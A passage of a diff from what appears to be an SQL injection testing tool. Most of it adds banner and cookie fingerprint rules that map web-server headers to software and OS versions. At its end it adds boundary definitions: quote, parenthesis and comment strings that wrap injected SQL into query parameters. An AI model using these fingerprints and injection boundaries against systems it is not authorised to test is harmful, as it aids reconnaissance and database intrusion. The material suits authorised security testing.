+    <regexp value="Apache/2\.4\.28 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="27"/>
+    </regexp>
+
+    <!-- Apache: FreeBSD -->
+
+    <regexp value="Apache/2\.0\.16 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.28 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.5"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.36 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.6"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.43 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.7|5.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.44 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.8"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.47 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.9"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.49 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.10"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.52 \(FreeBSD\)">
+        <info type="FreeBSD" release="4.11"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.46 \(FreeBSD\)">
+        <info type="FreeBSD" release="5.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.48 \(FreeBSD\)">
+        <info type="FreeBSD" release="5.2.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.50 \(FreeBSD\)">
+        <info type="FreeBSD" release="5.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.53 \(FreeBSD\)">
+        <info type="FreeBSD" release="5.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.0 \(FreeBSD\)">
+        <info type="FreeBSD" release="5.5|6.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.54 \(FreeBSD\)">
+        <info type="FreeBSD" release="6.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(FreeBSD\)">
+        <info type="FreeBSD" release="6.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.6 \(FreeBSD\)">
+        <info type="FreeBSD" release="6.3|7.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.9 \(FreeBSD\)">
+        <info type="FreeBSD" release="6.4|7.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.11 \(FreeBSD\)">
+        <info type="FreeBSD" release="7.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.14 \(FreeBSD\)">
+        <info type="FreeBSD" release="7.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.13 \(FreeBSD\)">
+        <info type="FreeBSD" release="8.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.15 \(FreeBSD\)">
+        <info type="FreeBSD" release="8.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.17 \(FreeBSD\)">
+        <info type="FreeBSD" release="8.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.21 \(FreeBSD\)">
+        <info type="FreeBSD" release="9.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(FreeBSD\)">
+        <info type="FreeBSD" release="9.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.9 \(FreeBSD\)">
+        <info type="FreeBSD" release="9.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.16 \(FreeBSD\)">
+        <info type="FreeBSD" release="10.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.27 \(FreeBSD\)">
+        <info type="FreeBSD" release="10.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.26 \(FreeBSD\)">
+        <info type="FreeBSD" release="11.1"/>
+    </regexp>
+
+    <!-- Apache: Mandrake / Mandriva -->
+
+    <regexp value="Apache/1\.3\.6 \(Unix\)\s+\(Mandrake/Linux\)">
+        <info type="Linux" distrib="Mandrake" release="6.0" codename="Venus"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.9 \(Unix\)\s+\(NetRevolution Advanced Server/Linux-Mandrake\)">
+        <info type="Linux" distrib="Mandrake" release="6.1|7.0" codename="Helios|Air"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.12 \(NetRevolution/Linux-Mandrake\)">
+        <info type="Linux" distrib="Mandrake" release="7.1" codename="Helium"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.14 \(Linux-Mandrake/">
+        <info type="Linux" distrib="Mandrake" release="7.2" codename="Odyssey"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.19 \(Linux-Mandrake/">
+        <info type="Linux" distrib="Mandrake" release="8.0" codename="Traktopel"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.20 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="8.1" codename="Vitamin"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.23 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="8.2" codename="Bluebird"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.26 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="9.0" codename="Dolphin"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.27 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="9.1" codename="Bamboo"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/2\.0\.44 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="9.1" codename="Bamboo"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.28 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="9.2" codename="FiveStar"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/2\.0\.47 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="9.1|9.2" codename="Bamboo|FiveStar"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.29 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="10.0" codename="Community"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/2\.0\.48 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="10.0" codename="Community"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/1\.3\.31 \(Linux-Mandrake/">
+        <info type="Linux" distrib="Mandrake" release="10.1" codename="Official"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/2\.0\.50 \(Mandrake Linux/">
+        <info type="Linux" distrib="Mandrake" release="10.0|10.1" codename="Community|Official"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/2\.0\.53 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandrake" release="10.2" codename="Limited Edition 2005"/>
+    </regexp>
+
+    <regexp value="Apache-AdvancedExtranetServer/2\.0\.54 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2006.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2007"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.4 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2007.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.6 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2008"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.8 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2008.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.9 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2009"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.11 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2009.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.14 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2010"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.15 \(Mandriva Linux/">
+        <info type="Linux" distrib="Mandriva" release="2010.1|2010.2"/>
+    </regexp>
+
+    <!-- Apache: Red Hat -->
+
+    <regexp value="Apache/1\.1\.3 Red Hat">
+        <info type="Linux" distrib="Red Hat" release="4.2" codename="Biltmore"/>
+    </regexp>
+
+    <regexp value="Apache/1\.2\.4 Red Hat">
+        <info type="Linux" distrib="Red Hat" release="5.0" codename="Hurricane"/>
+    </regexp>
+
+    <regexp value="Apache/1\.2\.6 Red Hat">
+        <info type="Linux" distrib="Red Hat" release="5.1" codename="Manhattan"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.3 \(Unix\)\s+\(Red Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="5.2" codename="Apollo"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.6 \(Unix\)\s+\(Red Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="6.0" codename="Hedwig"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.9 \(Unix\)  \(Red Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="6.1" codename="Cartman"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.12 \(Unix\)  \(Red Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="6.2|7.0" codename="Zoot|Guinness"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.19 \(Unix\)  \(Red-Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="7.1" codename="Seawolf"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.20 \(Unix\)  \(Red-Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="7.2" codename="Enigma"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.23 \(Unix\)  \(Red-Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="7.3" codename="Valhalla"/>
+    </regexp>
+
+ 	<regexp value="Apache/1\.3\.27 \(Unix\)  \(Red-Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="7.1|7.2|7.3" codename="Seawolf|Enigma|Valhalla" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.40 \(Red Hat Linux\)">
+        <info type="Linux" distrib="Red Hat" release="8.0|9" codename="Psyche|Shrike"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.22 \(Unix\)  \(Red-Hat/Linux\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 2.1" codename="Panama"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.46 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 3" codename="Taroon"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.52 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 4" codename="Nahant"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 5" codename="Tikanga"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.15 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 6" codename="Santiago"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 7" codename="Maipo"/>
+    </regexp>
+
+    <!-- Apache: SuSE -->
+
+    <regexp value="Apache/1\.3\.6 \(Unix\) \(SuSE/Linux\)">
+        <info type="Linux" distrib="SuSE" release="6.1"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.9 \(Unix\) \(SuSE/Linux\)">
+        <info type="Linux" distrib="SuSE" release="6.2"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.12 \(Unix\) \(SuSE/Linux\)">
+        <info technology="operating-system.type" type="str" value="Linux"/>
+        <info type="Linux" distrib="SuSE" release="6.4|7.0"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.17 \(Unix\) \(SuSE/Linux\)">
+        <info type="Linux" distrib="SuSE" release="7.1"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.19 \(Unix\) \(SuSE/Linux\)">
+        <info type="Linux" distrib="SuSE" release="7.2"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.20 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="7.3"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.23 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="8.0"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.26 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="8.1"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.27 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="8.2"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.28 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="9.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.40 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="8.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.44 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="8.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.47 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="9.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.49 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="9.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.50 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="9.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.53 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="9.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.54 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="10.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.0 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="10.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="10.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.4 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="10.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.8 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="11.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.10 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="11.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.13 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="11.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.15 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="11.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.17 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="11.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.21 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="12.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="12.2|12.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="13.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="13.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.16 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="42.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.23 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="42.2|42.3"/>
+    </regexp>
+
+    <!-- Apache: Ubuntu -->
+
+    <regexp value="Apache/2\.0\.50 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="4.10" codename="Warty Warthog"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.53 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="5.04" codename="Hoary Hedgehog"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.54 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="5.10" codename="Breezy Badger"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.55 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="6.06|6.10" codename="Dapper Drake|Edgy Eft"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="7.04" codename="Feisty Fawn"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.4 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="7.10" codename="Gutsy Gibbon"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.8 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="8.04" codename="Hardy Heron"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.9 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="8.10" codename="Intrepid Ibex"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.11 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="9.04" codename="Jaunty Jackalope"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.12 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="9.10" codename="Karmic Koala"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.14 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="10.04" codename="Lucid Lynx"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.16 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="10.10" codename="Maverick Meerkat"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.17 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="11.04" codename="Natty Narwhal"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.20 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="11.10" codename="Oneiric Ocelot"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="12.04|12.10|13.04" codename="Precise Pangolin|Quantal Quetzal|Raring Ringtail"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="13.10" codename="Saucy Salamander"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="14.10|15.04" codename="utopic|vivid"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.12 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="15.10" codename="willy"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.18 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="16.04|16.10" codename="xenial|yakkety"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="17.04" codename="zesty"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.27 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="17.10" codename="artful"/>
+    </regexp>
+
+    <!-- Nginx -->
+
+    <regexp value="nginx$">
+        <info technology="Nginx"/>
+    </regexp>
+
+    <regexp value="nginx/([\w\.]+)">
+        <info technology="Nginx" tech_version="1"/>
+    </regexp>
+
+    <!-- Google Web Server -->
+
+    <regexp value="GWS$">
+        <info technology="Google Web Server"/>
+    </regexp>
+
+    <regexp value="GWS/([\w\.]+)">
+        <info technology="Google Web Server" tech_version="1"/>
+    </regexp>
+
+    <!-- lighttpd -->
+
+    <regexp value="lighttpd$">
+        <info technology="lighttpd"/>
+    </regexp>
+
+    <regexp value="lighttpd/([\w\.]+)">
+        <info technology="lighttpd" tech_version="1"/>
+    </regexp>
+
+    <!-- OpenResty -->
+
+    <regexp value="openresty$">
+        <info technology="OpenResty"/>
+    </regexp>
+
+    <regexp value="openresty/([\w\.]+)">
+        <info technology="OpenResty" tech_version="1"/>
+    </regexp>
+
+    <!-- LiteSpeed -->
+
+    <regexp value="LiteSpeed$">
+        <info technology="LiteSpeed"/>
+    </regexp>
+
+    <regexp value="LiteSpeed/([\w\.]+)">
+        <info technology="LiteSpeed" tech_version="1"/>
+    </regexp>
+
+    <!-- Sun ONE -->
+
+    <regexp value="Sun-ONE-Web-Server/([\w\.]+)">
+        <info technology="Sun ONE" tech_version="1"/>
+    </regexp>
+</root>
--- a/data/xml/banner/servlet-engine.xml
+++ b/data/xml/banner/servlet-engine.xml
@@ -3,10 +3,18 @@
 <!-- Reference: http://www.http-stats.com/Servlet-Engine -->

 <root>
-    <regexp value="Tomcat( Web Server)*\/([\d\.]+)">
+    <regexp value="Tomcat( Web Server)?\/([\d\.]+)">
        <info technology="Tomcat" tech_version="1"/>
    </regexp>

+    <regexp value="Enhydra Application Server/([\d\.]+)">
+        <info technology="Enhydra" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Jetty/([\d\.]+)">
+        <info technology="Jetty" tech_version="1"/>
+    </regexp>
+
    <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
        <info technology="JSP" tech_version="1"/>
    </regexp>
--- a/data/xml/banner/set-cookie.xml
+++ b/data/xml/banner/set-cookie.xml
@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+     References:
+     * http://www.http-stats.com/Set-Cookie2
+     * http://www.owasp.org/index.php/Category:OWASP_Cookies_Database
+-->
+
+<root>
+    <regexp value="ASPSESSIONID">
+        <info technology="ASP" type="Windows"/>
+    </regexp>
+
+    <regexp value="ASP\.NET_SessionId|\.ASPXAUTH">
+        <info technology="ASP.NET" type="Windows"/>
+    </regexp>
+
+    <regexp value="JSESSIONID">
+        <info technology="JSP"/>
+    </regexp>
+
+    <regexp value="JServSessionId">
+        <info technology="JServ"/>
+    </regexp>
+
+    <regexp value="Ltpatoken">
+        <info technology="WebSphere"/>
+    </regexp>
+
+    <regexp value="PHPSESS">
+        <info technology="PHP"/>
+    </regexp>
+
+    <regexp value="RoxenUserID">
+        <info technology="Roxen"/>
+    </regexp>
+
+    <regexp value="wiki\d+_session">
+        <info technology="MediaWiki"/>
+    </regexp>
+
+    <regexp value="Apache">
+        <info technology="Apache"/>
+    </regexp>
+
+    <regexp value="DomAuthSessID">
+        <info technology="Domino|Notes"/>
+    </regexp>
+
+    <regexp value="CFID|CFTOKEN|CFMAGIC|CFGLOBALS">
+        <info technology="ColdFusion"/>
+    </regexp>
+
+    <regexp value="WebLogicSession">
+        <info technology="WebLogic"/>
+    </regexp>
+
+    <regexp value="MoodleSession">
+        <info technology="Moodle"/>
+    </regexp>
+
+    <regexp value="\bwp_">
+        <info technology="WordPress"/>
+    </regexp>
+</root>
--- a/data/xml/banner/sharepoint.xml
+++ b/data/xml/banner/sharepoint.xml
--- a/data/xml/banner/x-aspnet-version.xml
+++ b/data/xml/banner/x-aspnet-version.xml
@@ -4,6 +4,6 @@

 <root>
    <regexp value="([\d\.]+)">
-        <info technology="ASP.NET" tech_version="1" type="Windows" distrib="2003|2008"/>
+        <info technology="ASP.NET" tech_version="1" type="Windows"/>
    </regexp>
 </root>
--- a/data/xml/banner/x-powered-by.xml
+++ b/data/xml/banner/x-powered-by.xml
@@ -0,0 +1,49 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!-- Reference: https://publicwww.com/popular/powered/index.html -->
+
+<root>
+    <regexp value="PHP[\-\_\/\ ]([\d\.]+)">
+        <info technology="PHP" tech_version="1"/>
+    </regexp>
+
+    <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
+        <info technology="JSP" tech_version="1"/>
+    </regexp>
+
+    <regexp value="ASP[\/\d\.]*$">
+        <info technology="ASP" type="Windows"/>
+    </regexp>
+
+    <regexp value="EasyEngine ([\d\.]+)">
+        <info technology="EasyEngine" tech_version="1"/>
+    </regexp>
+
+    <regexp value="PleskLin">
+        <info technology="Plesk" type="Linux"/>
+    </regexp>
+
+    <regexp value="PleskWin">
+        <info technology="Plesk" type="Windows"/>
+    </regexp>
+
+    <regexp value="ThinkPHP">
+        <info technology="ThinkPHP"/>
+    </regexp>
+
+    <regexp value="ASP\.NET">
+        <info technology="ASP.NET" type="Windows"/>
+    </regexp>
+
+    <regexp value="Tomcat[\-\_\/\ ]?([\d\.]+)">
+        <info technology="Tomcat" tech_version="1"/>
+    </regexp>
+
+    <regexp value="JBoss[\-\_\/\ ]?([\d\.]+)">
+        <info technology="JBoss" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Servlet[\-\_\/\ ]?([\d\.]+)">
+        <info technology="Servlet" tech_version="1"/>
+    </regexp>
+</root>
--- a/data/xml/boundaries.xml
+++ b/data/xml/boundaries.xml
@@ -0,0 +1,558 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+Tag: <boundary>
+    How to prepend and append to the test ' <payload><comment> ' string.
+
+    Sub-tag: <level>
+        From which level check for this test.
+
+        Valid values:
+            1: Always (<100 requests)
+            2: Try a bit harder (100-200 requests)
+            3: Good number of requests (200-500 requests)
+            4: Extensive test (500-1000 requests)
+            5: You have plenty of time (>1000 requests)
+
+    Sub-tag: <clause>
+        In which clause the payload can work.
+
+        NOTE: for instance, there are some payload that do not have to be
+        tested as soon as it has been identified whether or not the
+        injection is within a WHERE clause condition.
+
+        Valid values:
+            0: Always
+            1: WHERE / HAVING
+            2: GROUP BY
+            3: ORDER BY
+            4: LIMIT
+            5: OFFSET
+            6: TOP
+            7: Table name
+            8: Column name
+            9: Pre-WHERE (non-query)
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <where>
+        Where to add our '<prefix> <payload><comment> <suffix>' string.
+
+        Valid values:
+            1: When the value of <test>'s <where> is 1.
+            2: When the value of <test>'s <where> is 2.
+            3: When the value of <test>'s <where> is 3.
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <ptype>
+        What is the parameter value type.
+
+        Valid values:
+            1: Unescaped numeric
+            2: Single quoted string
+            3: LIKE single quoted string
+            4: Double quoted string
+            5: LIKE double quoted string
+            6: Identifier (e.g. column name)
+
+    Sub-tag: <prefix>
+        A string to prepend to the payload.
+
+    Sub-tag: <suffix>
+        A string to append to the payload.
+
+Formats:
+    <boundary>
+        <level></level>
+        <clause></clause>
+        <where></where>
+        <ptype></ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+-->
+
+<root>
+    <!-- Generic boundaries -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1,2,3</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+    <!-- End of generic boundaries -->
+
+    <!-- WHERE/HAVING clause boundaries -->
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>))</prefix>
+        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)))</prefix>
+        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>0</clause>
+        <where>1,2,3</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
